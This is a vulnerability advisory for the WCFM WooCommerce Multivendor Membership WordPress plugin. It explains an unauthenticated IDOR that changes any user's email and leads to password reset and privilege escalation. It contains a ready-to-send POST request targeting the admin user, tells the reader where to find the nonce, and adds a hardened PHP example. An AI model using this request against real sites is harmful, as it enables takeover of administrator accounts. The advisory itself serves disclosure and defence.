WCFM – WooCommerce Multivendor Membership by WC Lovers WordPress plugin Privilege Escalation
LANAVDB ID: 3a841453-d083-4f97-a7f1-b398c7304284
The plugin is affected by an Unauthenticated Insecure Direct Object Reference (IDOR) to Arbitrary User Email Change vulnerability, which leads to User Password Reset, which in turn leads to Privilege Escalation. The plugin has an insecurely handled variable that allows changing any user’s email and gaining unauthorized access.
Let’s check the plugin
The processing() method in the WCFMvm_Memberships_Registration_Controller class handles the membership registration with the following code:
if ( $is_update ) {
    if ( ! wcfm_is_vendor() ) {
        // $user_data is built from the request and includes the user ID (member_id) and the email
        $member_id = wp_update_user( $user_data );
    }
}
As we can see, it is possible to specify the user id value in the request, in which case the request is treated as a user update rather than a user addition. It is also possible to specify the email in the request.
The user data used to update the user therefore includes both the user id (the member id) and the email, which means that any user’s email can be changed.
Once the user’s email has been changed, we can request a password reset, which is sent to our email, and change the password.
Let’s see how we can exploit this vulnerability
Only a single POST request is needed to exploit this vulnerability.
The HTTP request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=wcfm_ajax_controller&wcfm_ajax_nonce=99ace226a7&controller=wcfm-memberships-registration&wcfm_membership_registration_form=user_email%3Dexploit%40wordpress.local%26user_name%3D-%26member_id%3D1
The nonce can be found in the wcfm_params.wcfm_ajax_nonce JavaScript object.
The exploit script
I created a Python script which updates the specified user’s email:
Source: wclovers_wc_multivendor_membership_plugin_vdb_update_user_email_exploit.py
How to use:
Run the above command in the Linux terminal.
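For comparison, the following is an added example of how the update branch shown above could be hardened; it is illustrative code written for this page, not the plugin’s own code or the vendor’s fix. It assumes $is_update and $user_data are built from the request as in the snippet, keeps the page’s wcfm_is_vendor() check, and relies on standard WordPress functions (is_user_logged_in, get_current_user_id, current_user_can, sanitize_email, is_email, wp_update_user).

```php
<?php
// Illustrative hardened update path (added example, not the plugin's code).
// Assumed: $user_data comes from the request and may carry 'ID' and 'user_email'.
function wcfmvm_safe_membership_update( array $user_data, bool $is_update ) {
    if ( ! $is_update ) {
        return new WP_Error( 'not_update', 'Not an update request.' );
    }

    // The AJAX nonce is readable by anyone via wcfm_params, so it proves
    // nothing about who is calling; require an authenticated session.
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'unauthenticated', 'Login required.' );
    }

    // Keep the original vendor check from the plugin snippet.
    if ( wcfm_is_vendor() ) {
        return new WP_Error( 'vendor', 'Vendor accounts are not updated here.' );
    }

    // IDOR fix: a request-supplied member_id may only target the caller's own
    // account unless the caller is explicitly allowed to edit that user.
    $requested_id = isset( $user_data['ID'] ) ? (int) $user_data['ID'] : 0;
    $current_id   = get_current_user_id();
    if ( $requested_id && $requested_id !== $current_id
         && ! current_user_can( 'edit_user', $requested_id ) ) {
        return new WP_Error( 'forbidden', 'Cannot modify another user.' );
    }
    $user_data['ID'] = $requested_id ? $requested_id : $current_id;

    // Allow only the fields the registration form is meant to change,
    // so extra keys in the POST body cannot reach wp_update_user().
    $allowed   = array( 'ID', 'user_email', 'display_name' );
    $user_data = array_intersect_key( $user_data, array_flip( $allowed ) );

    if ( isset( $user_data['user_email'] ) ) {
        $email = sanitize_email( $user_data['user_email'] );
        if ( ! is_email( $email ) ) {
            return new WP_Error( 'bad_email', 'Invalid email address.' );
        }
        $user_data['user_email'] = $email;
    }

    // Returns the user ID on success or a WP_Error on failure.
    return wp_update_user( $user_data );
}
```

Because the email change is what enables the password-reset takeover, binding the update to the session’s own user ID (or an explicit edit_user capability) removes the IDOR regardless of what member_id the request carries.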
Tags: idor, password reset, privilege escalation, wordpress plugin